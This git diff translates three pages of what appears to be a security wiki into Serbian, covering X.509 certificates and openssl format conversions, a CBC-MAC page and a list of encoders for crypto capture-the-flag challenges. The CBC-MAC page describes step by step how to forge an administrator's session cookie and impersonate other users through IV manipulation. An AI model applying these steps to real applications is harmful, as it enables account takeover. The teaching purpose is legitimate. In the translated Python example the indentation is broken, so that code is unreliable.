@@ -1,47 +1,38 @@
-# Certificates
+# Sertifikati
 
 {{#include ../banners/hacktricks-training.md}}
 
-

+## Šta je Sertifikat
 
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=certificates) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+**Javni ključ sertifikat** je digitalni ID koji se koristi u kriptografiji da dokaže da neko poseduje javni ključ. Uključuje detalje o ključevi, identitet vlasnika (subjekt) i digitalni potpis od poverljive vlasti (izdavača). Ako softver veruje izdavaču i potpis je validan, sigurna komunikacija sa vlasnikom ključa je moguća.
 
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=certificates" %}
+Sertifikati se uglavnom izdaju od strane [sertifikacionih tela](https://en.wikipedia.org/wiki/Certificate_authority) (CAs) u [infrastrukturi javnog ključa](https://en.wikipedia.org/wiki/Public-key_infrastructure) (PKI) postavci. Druga metoda je [mreža poverenja](https://en.wikipedia.org/wiki/Web_of_trust), gde korisnici direktno verifikuju ključeve jedni drugih. Uobičajeni format za sertifikate je [X.509](https://en.wikipedia.org/wiki/X.509), koji se može prilagoditi specifičnim potrebama kako je navedeno u RFC 5280.
 
-## What is a Certificate
+## x509 Uobičajena Polja
 
-A **public key certificate** is a digital ID used in cryptography to prove someone owns a public key. It includes the key's details, the owner's identity (the subject), and a digital signature from a trusted authority (the issuer). If the software trusts the issuer and the signature is valid, secure communication with the key's owner is possible.
+### **Uobičajena Polja u x509 Sertifikatima**
 
-Certificates are mostly issued by [certificate authorities](https://en.wikipedia.org/wiki/Certificate_authority) (CAs) in a [public-key infrastructure](https://en.wikipedia.org/wiki/Public-key_infrastructure) (PKI) setup. Another method is the [web of trust](https://en.wikipedia.org/wiki/Web_of_trust), where users directly verify each other’s keys. The common format for certificates is [X.509](https://en.wikipedia.org/wiki/X.509), which can be adapted for specific needs as outlined in RFC 5280.
+U x509 sertifikatima, nekoliko **polja** igra ključne uloge u obezbeđivanju validnosti i sigurnosti sertifikata. Evo pregleda ovih polja:
 
-## x509 Common Fields
+- **Broj Verzije** označava verziju x509 formata.
+- **Serijski Broj** jedinstveno identifikuje sertifikat unutar sistema Sertifikacione vlasti (CA), uglavnom za praćenje opoziva.
+- **Subjekt** polje predstavlja vlasnika sertifikata, što može biti mašina, pojedinac ili organizacija. Uključuje detaljnu identifikaciju kao što su:
+- **Uobičajeno Ime (CN)**: Domeni pokriveni sertifikatom.
+- **Zemlja (C)**, **Lokacija (L)**, **Država ili Pokrajina (ST, S, ili P)**, **Organizacija (O)**, i **Organizaciona Jedinica (OU)** pružaju geografske i organizacione detalje.
+- **Istaknuto Ime (DN)** obuhvata punu identifikaciju subjekta.
+- **Izdavač** detaljno opisuje ko je verifikovao i potpisao sertifikat, uključujući slična podpolja kao Subjekt za CA.
+- **Period Validnosti** označen je **Ne Pre** i **Ne Posle** vremenskim oznakama, osiguravajući da sertifikat nije korišćen pre ili posle određenog datuma.
+- **Javni Ključ** sekcija, ključna za sigurnost sertifikata, specificira algoritam, veličinu i druge tehničke detalje javnog ključa.
+- **x509v3 ekstenzije** poboljšavaju funkcionalnost sertifikata, specificirajući **Korišćenje Ključa**, **Prošireno Korišćenje Ključa**, **Alternativno Ime Subjekta**, i druge osobine za fino podešavanje primene sertifikata.
 
-### **Common Fields in x509 Certificates**
-
-In x509 certificates, several **fields** play critical roles in ensuring the certificate's validity and security. Here's a breakdown of these fields:
-
-- **Version Number** signifies the x509 format's version.
-- **Serial Number** uniquely identifies the certificate within a Certificate Authority's (CA) system, mainly for revocation tracking.
-- The **Subject** field represents the certificate's owner, which could be a machine, an individual, or an organization. It includes detailed identification such as:
-  - **Common Name (CN)**: Domains covered by the certificate.
-  - **Country (C)**, **Locality (L)**, **State or Province (ST, S, or P)**, **Organization (O)**, and **Organizational Unit (OU)** provide geographical and organizational details.
-  - **Distinguished Name (DN)** encapsulates the full subject identification.
-- **Issuer** details who verified and signed the certificate, including similar subfields as the Subject for the CA.
-- **Validity Period** is marked by **Not Before** and **Not After** timestamps, ensuring the certificate is not used before or after a certain date.
-- The **Public Key** section, crucial for the certificate's security, specifies the algorithm, size, and other technical details of the public key.
-- **x509v3 extensions** enhance the certificate's functionality, specifying **Key Usage**, **Extended Key Usage**, **Subject Alternative Name**, and other properties to fine-tune the certificate's application.
-
-#### **Key Usage and Extensions**
-
-- **Key Usage** identifies cryptographic applications of the public key, like digital signature or key encipherment.
-- **Extended Key Usage** further narrows down the certificate's use cases, e.g., for TLS server authentication.
-- **Subject Alternative Name** and **Basic Constraint** define additional host names covered by the certificate and whether it's a CA or end-entity certificate, respectively.
-- Identifiers like **Subject Key Identifier** and **Authority Key Identifier** ensure uniqueness and traceability of keys.
-- **Authority Information Access** and **CRL Distribution Points** provide paths to verify the issuing CA and check certificate revocation status.
-- **CT Precertificate SCTs** offer transparency logs, crucial for public trust in the certificate.
+#### **Korišćenje Ključa i Ekstenzije**
 
+- **Korišćenje Ključa** identifikuje kriptografske primene javnog ključa, kao što su digitalni potpis ili enkripcija ključa.
+- **Prošireno Korišćenje Ključa** dodatno sužava slučajeve korišćenja sertifikata, npr. za TLS autentifikaciju servera.
+- **Alternativno Ime Subjekta** i **Osnovna Ograničenja** definišu dodatne nazive hostova pokrivene sertifikatom i da li je to CA ili sertifikat krajnjeg entiteta, redom.
+- Identifikatori kao što su **Identifikator Ključa Subjekta** i **Identifikator Ključa Vlasti** osiguravaju jedinstvenost i praćenje ključeva.
+- **Pristup Informacijama o Vlasti** i **CRL Distribucione Tačke** pružaju puteve za verifikaciju izdavača CA i proveru statusa opoziva sertifikata.
+- **CT Precertifikat SCTs** nude transparente dnevnike, što je ključno za javno poverenje u sertifikat.
 ```python
 # Example of accessing and using x509 certificate fields programmatically:
 from cryptography import x509
@@ -49,8 +40,8 @@ from cryptography.hazmat.backends import default_backend
 
 # Load an x509 certificate (assuming cert.pem is a certificate file)
 with open("cert.pem", "rb") as file:
-    cert_data = file.read()
-    certificate = x509.load_pem_x509_certificate(cert_data, default_backend())
+cert_data = file.read()
+certificate = x509.load_pem_x509_certificate(cert_data, default_backend())
 
 # Accessing fields
 serial_number = certificate.serial_number
@@ -63,160 +54,123 @@ print(f"Issuer: {issuer}")
 print(f"Subject: {subject}")
 print(f"Public Key: {public_key}")
 ```
+### **Razlika između OCSP i CRL distribucionih tačaka**
 
-### **Difference between OCSP and CRL Distribution Points**
+**OCSP** (**RFC 2560**) uključuje klijenta i odgovarača koji zajedno proveravaju da li je digitalni javni ključ sertifikat opozvan, bez potrebe za preuzimanjem celog **CRL**. Ova metoda je efikasnija od tradicionalnog **CRL**, koji pruža listu opozvanih serijskih brojeva sertifikata, ali zahteva preuzimanje potencijalno velikog fajla. CRL može sadržati do 512 unosa. Više detalja je dostupno [ovde](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm).
 
-**OCSP** (**RFC 2560**) involves a client and a responder working together to check if a digital public-key certificate has been revoked, without needing to download the full **CRL**. This method is more efficient than the traditional **CRL**, which provides a list of revoked certificate serial numbers but requires downloading a potentially large file. CRLs can include up to 512 entries. More details are available [here](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm).
+### **Šta je transparentnost sertifikata**
 
-### **What is Certificate Transparency**
+Transparentnost sertifikata pomaže u borbi protiv pretnji vezanih za sertifikate osiguravajući da je izdavanje i postojanje SSL sertifikata vidljivo vlasnicima domena, CA i korisnicima. Njeni ciljevi su:
 
-Certificate Transparency helps combat certificate-related threats by ensuring the issuance and existence of SSL certificates are visible to domain owners, CAs, and users. Its objectives are:
+- Sprečavanje CA da izdaju SSL sertifikate za domen bez znanja vlasnika domena.
+- Uspostavljanje otvorenog sistema revizije za praćenje greškom ili zlonamerno izdatih sertifikata.
+- Zaštita korisnika od prevarantskih sertifikata.
 
-- Preventing CAs from issuing SSL certificates for a domain without the domain owner's knowledge.
-- Establishing an open auditing system for tracking mistakenly or maliciously issued certificates.
-- Safeguarding users against fraudulent certificates.
+#### **Dnevnici sertifikata**
 
-#### **Certificate Logs**
+Dnevnici sertifikata su javno revizibilni, samo za dodavanje zapisi o sertifikatima, koje održavaju mrežne usluge. Ovi dnevnici pružaju kriptografske dokaze za svrhe revizije. Izdavaoci i javnost mogu podnositi sertifikate ovim dnevnicima ili ih pretraživati radi verifikacije. Dok tačan broj servera za dnevnik nije fiksiran, očekuje se da će biti manje od hiljadu globalno. Ove servere mogu nezavisno upravljati CA, ISP ili bilo koja zainteresovana strana.
 
-Certificate logs are publicly auditable, append-only records of certificates, maintained by network services. These logs provide cryptographic proofs for auditing purposes. Both issuance authorities and the public can submit certificates to these logs or query them for verification. While the exact number of log servers is not fixed, it's expected to be less than a thousand globally. These servers can be independently managed by CAs, ISPs, or any interested entity.
+#### **Upit**
 
-#### **Query**
+Da biste istražili dnevnike transparentnosti sertifikata za bilo koji domen, posetite [https://crt.sh/](https://crt.sh).
 
-To explore Certificate Transparency logs for any domain, visit [https://crt.sh/](https://crt.sh).
+Postoje različiti formati za skladištenje sertifikata, svaki sa svojim slučajevima upotrebe i kompatibilnošću. Ovaj pregled pokriva glavne formate i pruža smernice za konvertovanje između njih.
 
-Different formats exist for storing certificates, each with its own use cases and compatibility. This summary covers the main formats and provides guidance on converting between them.
+## **Formati**
 
-## **Formats**
+### **PEM format**
 
-### **PEM Format**
+- Najšire korišćen format za sertifikate.
+- Zahteva odvojene fajlove za sertifikate i privatne ključeve, kodirane u Base64 ASCII.
+- Uobičajene ekstenzije: .cer, .crt, .pem, .key.
+- Pretežno koriste Apache i slični serveri.
 
-- Most widely used format for certificates.
-- Requires separate files for certificates and private keys, encoded in Base64 ASCII.
-- Common extensions: .cer, .crt, .pem, .key.
-- Primarily used by Apache and similar servers.
+### **DER format**
 
-### **DER Format**
+- Binarni format sertifikata.
+- Nedostaju "BEGIN/END CERTIFICATE" izjave koje se nalaze u PEM fajlovima.
+- Uobičajene ekstenzije: .cer, .der.
+- Često se koristi sa Java platformama.
 
-- A binary format of certificates.
-- Lacks the "BEGIN/END CERTIFICATE" statements found in PEM files.
-- Common extensions: .cer, .der.
-- Often used with Java platforms.
+### **P7B/PKCS#7 format**
 
-### **P7B/PKCS#7 Format**
+- Skladišti se u Base64 ASCII, sa ekstenzijama .p7b ili .p7c.
+- Sadrži samo sertifikate i lance sertifikata, isključujući privatni ključ.
+- Podržava ga Microsoft Windows i Java Tomcat.
 
-- Stored in Base64 ASCII, with extensions .p7b or .p7c.
-- Contains only certificates and chain certificates, excluding the private key.
-- Supported by Microsoft Windows and Java Tomcat.
+### **PFX/P12/PKCS#12 format**
 
-### **PFX/P12/PKCS#12 Format**
+- Binarni format koji enkapsulira server sertifikate, međusertifikate i privatne ključeve u jednom fajlu.
+- Ekstenzije: .pfx, .p12.
+- Pretežno se koristi na Windows-u za uvoz i izvoz sertifikata.
 
-- A binary format that encapsulates server certificates, intermediate certificates, and private keys in one file.
-- Extensions: .pfx, .p12.
-- Mainly used on Windows for certificate import and export.
+### **Konvertovanje formata**
 
-### **Converting Formats**
-
-**PEM conversions** are essential for compatibility:
+**PEM konverzije** su neophodne za kompatibilnost:
 
 - **x509 to PEM**
-
 ```bash
 openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem
 ```
-
-- **PEM to DER**
-
+- **PEM u DER**
 ```bash
 openssl x509 -outform der -in certificatename.pem -out certificatename.der
 ```
-
-- **DER to PEM**
-
+- **DER u PEM**
 ```bash
 openssl x509 -inform der -in certificatename.der -out certificatename.pem
 ```
-
-- **PEM to P7B**
-
+- **PEM u P7B**
 ```bash
 openssl crl2pkcs7 -nocrl -certfile certificatename.pem -out certificatename.p7b -certfile CACert.cer
 ```
-
-- **PKCS7 to PEM**
-
+- **PKCS7 u PEM**
 ```bash
 openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.pem
 ```
+**PFX konverzije** su ključne za upravljanje sertifikatima na Windows-u:
 
-**PFX conversions** are crucial for managing certificates on Windows:
-
-- **PFX to PEM**
-
+- **PFX u PEM**
 ```bash
 openssl pkcs12 -in certificatename.pfx -out certificatename.pem
 ```
-
-- **PFX to PKCS#8** involves two steps:
-  1. Convert PFX to PEM
-
+- **PFX to PKCS#8** uključuje dva koraka:
+1. Konvertujte PFX u PEM
 ```bash
 openssl pkcs12 -in certificatename.pfx -nocerts -nodes -out certificatename.pem
 ```
-
-2. Convert PEM to PKCS8
-
+2. Konvertujte PEM u PKCS8
 ```bash
 openSSL pkcs8 -in certificatename.pem -topk8 -nocrypt -out certificatename.pk8
 ```
-
-- **P7B to PFX** also requires two commands:
-  1. Convert P7B to CER
-
+- **P7B to PFX** takođe zahteva dve komande:
+1. Konvertujte P7B u CER
 ```bash
 openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.cer
 ```
-
-2. Convert CER and Private Key to PFX
-
+2. Konvertujte CER i privatni ključ u PFX
 ```bash
 openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer
 ```
-
-- **ASN.1 (DER/PEM) editing** (works with certificates or almost any other ASN.1 structure):
-  1. Clone [asn1template](https://github.com/wllm-rbnt/asn1template/)
-
+- **ASN.1 (DER/PEM) uređivanje** (radi sa sertifikatima ili gotovo bilo kojom drugom ASN.1 strukturom):
+1. Klonirajte [asn1template](https://github.com/wllm-rbnt/asn1template/)
 ```bash
 git clone https://github.com/wllm-rbnt/asn1template.git
 ```
-
-2. Convert DER/PEM to OpenSSL's generation format
-
+2. Konvertujte DER/PEM u OpenSSL-ov format generacije
 ```bash
 asn1template/asn1template.pl certificatename.der > certificatename.tpl
 asn1template/asn1template.pl -p certificatename.pem > certificatename.tpl
 ```
-
-3. Edit certificatename.tpl according to your requirements
-
+3. Izmenite certificatename.tpl prema vašim zahtevima
 ```bash
 vim certificatename.tpl
 ```
-
-4. Rebuild the modified certificate
-
+4. Ponovo izgradite modifikovani sertifikat
 ```bash
 openssl asn1parse -genconf certificatename.tpl -out certificatename_new.der
 openssl asn1parse -genconf certificatename.tpl -outform PEM -out certificatename_new.pem
 ```
-
----
-
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=certificates) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=certificates" %}
+--- 
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md b/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md
index 47f1b2713..88b994a98 100644
--- a/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md
+++ b/src/crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md
@@ -2,54 +2,54 @@
 
 # CBC
 
-If the **cookie** is **only** the **username** (or the first part of the cookie is the username) and you want to impersonate the username "**admin**". Then, you can create the username **"bdmin"** and **bruteforce** the **first byte** of the cookie.
+Ako je **kolačić** **samo** **korisničko ime** (ili je prvi deo kolačića korisničko ime) i želite da se lažno predstavljate kao korisničko ime "**admin**". Tada možete kreirati korisničko ime **"bdmin"** i **bruteforce**-ovati **prvi bajt** kolačića.
 
 # CBC-MAC
 
-**Cipher block chaining message authentication code** (**CBC-MAC**) is a method used in cryptography. It works by taking a message and encrypting it block by block, where each block's encryption is linked to the one before it. This process creates a **chain of blocks**, making sure that changing even a single bit of the original message will lead to an unpredictable change in the last block of encrypted data. To make or reverse such a change, the encryption key is required, ensuring security.
+**Cipher block chaining message authentication code** (**CBC-MAC**) je metoda koja se koristi u kriptografiji. Funkcioniše tako što uzima poruku i šifruje je blok po blok, pri čemu je šifrovanje svakog bloka povezano sa prethodnim. Ovaj proces stvara **lanac blokova**, osiguravajući da će promena čak i jednog bita originalne poruke dovesti do nepredvidive promene u poslednjem bloku šifrovanih podataka. Da bi se izvršila ili obrnula takva promena, potrebna je šifrovana ključeva, čime se osigurava bezbednost.
 
-To calculate the CBC-MAC of message m, one encrypts m in CBC mode with zero initialization vector and keeps the last block. The following figure sketches the computation of the CBC-MAC of a message comprising blocks![https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) using a secret key k and a block cipher E:
+Da bi se izračunao CBC-MAC poruke m, šifruje se m u CBC režimu sa nultim inicijalizacionim vektorom i čuva se poslednji blok. Sledeća slika prikazuje izračunavanje CBC-MAC-a poruke koja se sastoji od blokova![https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) koristeći tajni ključ k i blok šifru E:
 
 ![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC_structure_(en).svg/570px-CBC-MAC_structure_(en).svg.png]()
 
-# Vulnerability
+# Ranljivost
 
-With CBC-MAC usually the **IV used is 0**.\
-This is a problem because 2 known messages (`m1` and `m2`) independently will generate 2 signatures (`s1` and `s2`). So:
+Sa CBC-MAC obično je **IV koji se koristi 0**.\
+To je problem jer 2 poznate poruke (`m1` i `m2`) nezavisno generišu 2 potpisa (`s1` i `s2`). Tako:
 
 - `E(m1 XOR 0) = s1`
 - `E(m2 XOR 0) = s2`
 
-Then a message composed by m1 and m2 concatenated (m3) will generate 2 signatures (s31 and s32):
+Tada poruka sastavljena od m1 i m2 konkateniranih (m3) generisaće 2 potpisa (s31 i s32):
 
 - `E(m1 XOR 0) = s31 = s1`
 - `E(m2 XOR s1) = s32`
 
-**Which is possible to calculate without knowing the key of the encryption.**
+**Što je moguće izračunati bez poznavanja ključa šifrovanja.**
 
-Imagine you are encrypting the name **Administrator** in **8bytes** blocks:
+Zamislite da šifrujete ime **Administrator** u **8 bajtnih** blokova:
 
 - `Administ`
 - `rator\00\00\00`
 
-You can create a username called **Administ** (m1) and retrieve the signature (s1).\
-Then, you can create a username called the result of `rator\00\00\00 XOR s1`. This will generate `E(m2 XOR s1 XOR 0)` which is s32.\
-now, you can use s32 as the signature of the full name **Administrator**.
+Možete kreirati korisničko ime pod nazivom **Administ** (m1) i dobiti potpis (s1).\
+Zatim, možete kreirati korisničko ime koje je rezultat `rator\00\00\00 XOR s1`. Ovo će generisati `E(m2 XOR s1 XOR 0)` što je s32.\
+sada, možete koristiti s32 kao potpis punog imena **Administrator**.
 
-### Summary
+### Sažetak
 
-1. Get the signature of username **Administ** (m1) which is s1
-2. Get the signature of username **rator\x00\x00\x00 XOR s1 XOR 0** is s32**.**
-3. Set the cookie to s32 and it will be a valid cookie for the user **Administrator**.
+1. Dobijte potpis korisničkog imena **Administ** (m1) koji je s1
+2. Dobijte potpis korisničkog imena **rator\x00\x00\x00 XOR s1 XOR 0** je s32**.**
+3. Postavite kolačić na s32 i biće to validan kolačić za korisnika **Administrator**.
 
-# Attack Controlling IV
+# Napad Kontrolisanjem IV
 
-If you can control the used IV the attack could be very easy.\
-If the cookies is just the username encrypted, to impersonate the user "**administrator**" you can create the user "**Administrator**" and you will get it's cookie.\
-Now, if you can control the IV, you can change the first Byte of the IV so **IV\[0] XOR "A" == IV'\[0] XOR "a"** and regenerate the cookie for the user **Administrator.** This cookie will be valid to **impersonate** the user **administrator** with the initial **IV**.
+Ako možete kontrolisati korišćeni IV, napad bi mogao biti vrlo lak.\
+Ako je kolačić samo šifrovano korisničko ime, da biste se lažno predstavljali kao korisnik "**administrator**", možete kreirati korisnika "**Administrator**" i dobićete njegov kolačić.\
+Sada, ako možete kontrolisati IV, možete promeniti prvi bajt IV-a tako da **IV\[0] XOR "A" == IV'\[0] XOR "a"** i regenerisati kolačić za korisnika **Administrator.** Ovaj kolačić će biti validan za **lažno predstavljanje** korisnika **administrator** sa inicijalnim **IV**.
 
-## References
+## Reference
 
-More information in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC)
+Više informacija na [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC)
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/crypto-and-stego/crypto-ctfs-tricks.md b/src/crypto-and-stego/crypto-ctfs-tricks.md
index bb2b5f049..3115edaeb 100644
--- a/src/crypto-and-stego/crypto-ctfs-tricks.md
+++ b/src/crypto-and-stego/crypto-ctfs-tricks.md
@@ -25,7 +25,7 @@
 
 ## Encoders
 
-Most of encoded data can be decoded with these 2 ressources:
+Većina kodiranih podataka može se dekodirati pomoću ovih 2 resursa:
 
 - [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list)
 - [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
@@ -33,7 +33,7 @@ Most of encoded data can be decoded with these 2 ressources:
 ### Substitution Autosolvers
 
 - [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram)
-- [https://quipqiup.com/](https://quipqiup.com) - Very good !
+- [https://quipqiup.com/](https://quipqiup.com) - Veoma dobro!
 
 #### Caesar - ROTx Autosolvers
 
@@ -45,95 +45,90 @@ Most of encoded data can be decoded with these 2 ressources:
 
 ### Base Encodings Autosolver
 
-Check all these bases with: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
+Proverite sve ove baze sa: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
 
 - **Ascii85**
-  - `BQ%]q@psCd@rH0l`
+- `BQ%]q@psCd@rH0l`
 - **Base26** \[_A-Z_]
-  - `BQEKGAHRJKHQMVZGKUXNT`
+- `BQEKGAHRJKHQMVZGKUXNT`
 - **Base32** \[_A-Z2-7=_]
-  - `NBXWYYLDMFZGCY3PNRQQ====`
+- `NBXWYYLDMFZGCY3PNRQQ====`
 - **Zbase32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_]
-  - `pbzsaamdcf3gna5xptoo====`
+- `pbzsaamdcf3gna5xptoo====`
 - **Base32 Geohash** \[_0-9b-hjkmnp-z_]
-  - `e1rqssc3d5t62svgejhh====`
+- `e1rqssc3d5t62svgejhh====`
 - **Base32 Crockford** \[_0-9A-HJKMNP-TV-Z_]
-  - `D1QPRRB3C5S62RVFDHGG====`
+- `D1QPRRB3C5S62RVFDHGG====`
 - **Base32 Extended Hexadecimal** \[_0-9A-V_]
-  - `D1NMOOB3C5P62ORFDHGG====`
+- `D1NMOOB3C5P62ORFDHGG====`
 - **Base45** \[_0-9A-Z $%\*+-./:_]
-  - `59DPVDGPCVKEUPCPVD`
+- `59DPVDGPCVKEUPCPVD`
 - **Base58 (bitcoin)** \[_1-9A-HJ-NP-Za-km-z_]
-  - `2yJiRg5BF9gmsU6AC`
+- `2yJiRg5BF9gmsU6AC`
 - **Base58 (flickr)** \[_1-9a-km-zA-HJ-NP-Z_]
-  - `2YiHqF5bf9FLSt6ac`
+- `2YiHqF5bf9FLSt6ac`
 - **Base58 (ripple)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_]
-  - `pyJ5RgnBE9gm17awU`
+- `pyJ5RgnBE9gm17awU`
 - **Base62** \[_0-9A-Za-z_]
-  - `g2AextRZpBKRBzQ9`
+- `g2AextRZpBKRBzQ9`
 - **Base64** \[_A-Za-z0-9+/=_]
-  - `aG9sYWNhcmFjb2xh`
+- `aG9sYWNhcmFjb2xh`
 - **Base67** \[_A-Za-z0-9-_.!\~\_]
-  - `NI9JKX0cSUdqhr!p`
+- `NI9JKX0cSUdqhr!p`
 - **Base85 (Ascii85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
-  - `BQ%]q@psCd@rH0l`
+- `BQ%]q@psCd@rH0l`
 - **Base85 (Adobe)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
-  - `<~BQ%]q@psCd@rH0l~>`
+- `<~BQ%]q@psCd@rH0l~>`
 - **Base85 (IPv6 or RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_]
-  - `Xm4y`V\_|Y(V{dF>\`
+- `Xm4y`V\_|Y(V{dF>\`
 - **Base85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
-  - `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d`
+- `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d`
 - **Base85 (XML)** \[\_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\_\_]
-  - `Xm4y|V{~Y+V}dF?`
+- `Xm4y|V{~Y+V}dF?`
 - **Base91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_]
-  - `frDg[*jNN!7&BQM`
+- `frDg[*jNN!7&BQM`
 - **Base100** \[]
-  - `👟👦👣👘👚👘👩👘👚👦👣👘`
+- `👟👦👣👘👚👘👩👘👚👦👣👘`
 - **Base122** \[]
-  - `4F ˂r0Xmvc`
+- `4F ˂r0Xmvc`
 - **ATOM-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_]
-  - `MIc3KiXa+Ihz+lrXMIc3KbCC`
+- `MIc3KiXa+Ihz+lrXMIc3KbCC`
 - **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_]
-  - `DmPsv8J7qrlKEoY7`
+- `DmPsv8J7qrlKEoY7`
 - **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_]
-  - `kLD8iwKsigSalLJ5`
+- `kLD8iwKsigSalLJ5`
 - **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_]
-  - `ayRiIo1gpO+uUc7g`
+- `ayRiIo1gpO+uUc7g`
 - **ESAB46** \[]
-  - `3sHcL2NR8WrT7mhR`
+- `3sHcL2NR8WrT7mhR`
 - **MEGAN45** \[]
-  - `kLD8igSXm2KZlwrX`
+- `kLD8igSXm2KZlwrX`
 - **TIGO3FX** \[]
-  - `7AP9mIzdmltYmIP9mWXX`
+- `7AP9mIzdmltYmIP9mWXX`
 - **TRIPO5** \[]
-  - `UE9vSbnBW6psVzxB`
+- `UE9vSbnBW6psVzxB`
 - **FERON74** \[]
-  - `PbGkNudxCzaKBm0x`
+- `PbGkNudxCzaKBm0x`
 - **GILA7** \[]
-  - `D+nkv8C1qIKMErY1`
+- `D+nkv8C1qIKMErY1`
 - **Citrix CTX1** \[]
-  - `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK`
+- `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK`
 
 [http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html)
 
 ### HackerizeXS \[_╫Λ↻├☰┏_]
-
 ```
 ╫☐↑Λ↻Λ┏Λ↻☐↑Λ
 ```
-
-- [http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html)
+- [http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) - 404 Mrtvo: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html)
 
 ### Morse
-
 ```
 .... --- .-.. -.-. .- .-. .- -.-. --- .-.. .-
 ```
-
-- [http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
+- [http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html) - 404 Mrtav: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
 
 ### UUencoder
-
 ```
 begin 644 webutils_pl
 M2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(
@@ -142,98 +137,79 @@ F3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$$`
 `
 end
 ```
-
-- [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu)
-
 ### XXEncoder
-
 ```
 begin 644 webutils_pl
 hG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236
